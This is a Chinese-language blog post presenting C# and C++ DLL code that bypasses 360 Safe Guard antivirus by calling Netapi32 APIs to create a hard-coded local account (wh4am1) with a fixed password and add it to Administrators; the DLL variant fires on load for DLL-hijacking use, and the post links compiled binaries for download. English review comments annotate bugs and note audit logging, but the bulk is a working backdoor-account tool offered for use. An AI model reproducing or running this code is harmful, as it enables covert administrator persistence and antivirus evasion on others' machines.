利用C#编写的绕过360安全卫士添加系统用户

时间:2022-07-22

今天在群里看到一位大佬发的绕过360安全卫士添加系统用户权限的脚本,于是乎,我便下载下来分析了一下,可知它是通过调用系统 API 函数来规避杀软的:

所以我就蹭一波热度,自己写了个 C# 版本的, Class 类如下:

using System;
using System.Runtime.InteropServices;

namespace Bypass360
{
    /// <summary>
    /// Thin P/Invoke wrapper over two Netapi32 account-management calls.
    /// Calling the API directly avoids spawning net.exe/net1.exe, which is the
    /// whole "bypass" the article describes; the account and group changes
    /// themselves still go through the normal local account database and are
    /// recorded by Security-log account-management auditing (user creation is
    /// event 4720, local-group membership change is event 4732).
    /// </summary>
    public class LocalGroupUserHelper
    {
        // Native: NET_API_STATUS NetUserAdd(servername, level, buf, parm_err).
        // NOTE(review): parm_err is an output pointer in the native signature; it
        // is declared as a plain int here (and passed as 0 below), so the index of
        // the rejected field is never received. The C++ sample on this page passes
        // &dwError instead.
        [DllImport("Netapi32.dll")]
        extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);

        // Native: NET_API_STATUS NetLocalGroupAddMembers(servername, groupname, level, buf, totalentries).
        // Only level 3 (LOCALGROUP_MEMBERS_INFO_3, member given by name) is used in this file.
        [DllImport("Netapi32.dll")]
        extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
         int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);

        // Managed mirror of LOCALGROUP_MEMBERS_INFO_3: one member identified by
        // "DOMAIN\name" or a bare account name (GroupAddMembers passes the bare name).
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // native field: lgrmi3_domainandname
        }

        // Managed mirror of USER_INFO_1. Marshalling is positional, so the field
        // names need not match the native ones (e.g. "comment" below is
        // usri1_comment); the order and count of fields must not change.
       [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;          // account name
            public string usri1_password;      // plaintext password, handed to the API as-is
            public int usri1_password_age;     // never assigned by AddUser (stays 0)
            public int usri1_priv;             // AddUser sets 1 (USER_PRIV_USER)
            public string usri1_home_dir;      // AddUser passes null
            public string comment;             // native name: usri1_comment
            public int usri1_flags;            // never assigned by AddUser (stays 0); the C++ sample sets UF_* flags here
            public string usri1_script_path;   // AddUser passes null
        }

        /// <summary>
        /// Creates a local user account via NetUserAdd (information level 1).
        /// The native call returns non-zero on failure; this method discards that
        /// status and only prints a message, so callers cannot tell whether the
        /// account was actually created.
        /// </summary>
        /// <param name="serverName">Machine name; null means the local machine.</param>
        /// <param name="userName">Name of the account to create.</param>
        /// <param name="password">Plaintext password for the new account.</param>
        /// <param name="strComment">Free-text comment stored with the account; may be null.</param>
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            USER_INFO_1 NewUser = new USER_INFO_1(); // all fields start as null/0, including usri1_flags and usri1_password_age

            NewUser.usri1_name = userName; // Allocates the username
            NewUser.usri1_password = password; // allocates the password
            NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
            NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
            NewUser.comment = strComment; // Comment on the User
            NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path

            // Level 1; parm_err is passed as 0 (see the note on the declaration),
            // so the index of a rejected field is lost. Non-zero means failure.
            if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0)
            {
                Console.WriteLine("Error Adding User");
            }
        }

        /// <summary>
        /// Adds an existing account to a local group via NetLocalGroupAddMembers
        /// (information level 3, one entry). As with AddUser, the non-zero failure
        /// status is discarded and only a console message is written.
        /// </summary>
        /// <param name="serverName">Machine name; null means the local machine.</param>
        /// <param name="groupName">Name of the local group to modify.</param>
        /// <param name="userName">Account to add, passed as given (no domain prefix is added).</param>
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
            NewMember.domainandname = userName;
            // Level 3, exactly one entry; non-zero return means failure.
            if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0)
            {
                Console.WriteLine("Error Adding Group Member"); 
            }
        }
    }
}

在 Class 类中定义了需要用到的两个系统 API 函数

  • NetUserAdd
  • NetLocalGroupAddMembers

Main 类如下:

using System;
using System.Runtime.InteropServices;
using Bypass360;

namespace Bypass360Add
{
    /// <summary>
    /// Console entry point. Despite the class name nothing here bypasses UAC:
    /// NetUserAdd and NetLocalGroupAddMembers require the caller to already hold
    /// administrative rights, so the process must run elevated for the calls to
    /// succeed. The account name and password are hard-coded literals.
    /// </summary>
    public static class BypassUAC_csharp
    {

        // Win32 ExitProcess: terminates the process immediately with the given
        // exit code instead of returning from Main.
        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);

        /// <summary>
        /// Creates the hard-coded user, adds it to the Administrators group, then
        /// exits with code 1 regardless of whether either call succeeded (the
        /// helper only prints on failure and returns nothing).
        /// </summary>
        /// <param name="args">Command-line arguments; unused.</param>
        public static void Main(string[] args)
        {
            LocalGroupUserHelper local = new LocalGroupUserHelper();
            string username = "wh4am1";          // hard-coded account name
            string password = "qqai@love";       // hard-coded plaintext password
            string groupname = "Administrators";
            local.AddUser(null, username, password, null); // null server = local machine; no comment
            local.GroupAddMembers(null, groupname, username);
            ExitProcess(1); // always exit code 1, even on success
        }
    }
}

运行后会在目标机器上创建一个用户名为 wh4am1、密码为 qqai@love 的 Administrators 组用户

当然,如果是想利用 Dll 劫持等方式来添加用户,我也提供 C++ Dll 版本的代码

#include 
#include 
#include 
#include

#pragma comment(lib,"netapi32.lib")
// Creates the hard-coded local account and adds it to Administrators using the
// same two Netapi32 calls as the C# class above. Despite the name, no thread is
// created: this runs synchronously on the caller's thread.
void StartExploitThread() {
  USER_INFO_1 ui;          // NOTE(review): not zero-initialised; usri1_password_age is never assigned
  DWORD dwError = 0;       // receives the index of the rejected field on failure; never read afterwards
  ui.usri1_name = (LPWSTR) L"wh4am1";
  ui.usri1_password = (LPWSTR) L"qqai@love";
  ui.usri1_priv = USER_PRIV_USER;
  ui.usri1_home_dir = NULL;
  ui.usri1_comment = (LPWSTR) "";   // NOTE(review): narrow literal cast to LPWSTR is not a valid wide string; the other fields use L"..."
  // UF_SCRIPT: logon script is executed; UF_DONT_EXPIRE_PASSWD: password never expires;
  // UF_PASSWD_CANT_CHANGE: the user cannot change the password
  ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD | UF_PASSWD_CANT_CHANGE;
  ui.usri1_script_path = NULL;

  // Return status is discarded, so a failure here is silent.
  NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
  LOCALGROUP_MEMBERS_INFO_3 account;
  account.lgrmi3_domainandname = (LPWSTR)L"wh4am1";

  // Level 3, one entry, local machine; return status discarded here too.
  NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
}

// Standard DLL entry point. All the work happens synchronously in
// DLL_PROCESS_ATTACH, i.e. inside the loader lock while the module is being
// loaded; the thread and detach notifications are no-ops. It always reports
// success to the loader, so the host process keeps running whether or not the
// account calls succeeded.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
  switch (ul_reason_for_call)
  {
  case DLL_PROCESS_ATTACH:
    StartExploitThread(); // runs under the loader lock, not on a new thread
    break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
    break;
  }
  return TRUE;
}

成功效果如下:


编译好的成品附件分享

链接:https://share.weiyun.com/5mbP3pC

密码:bugfor

end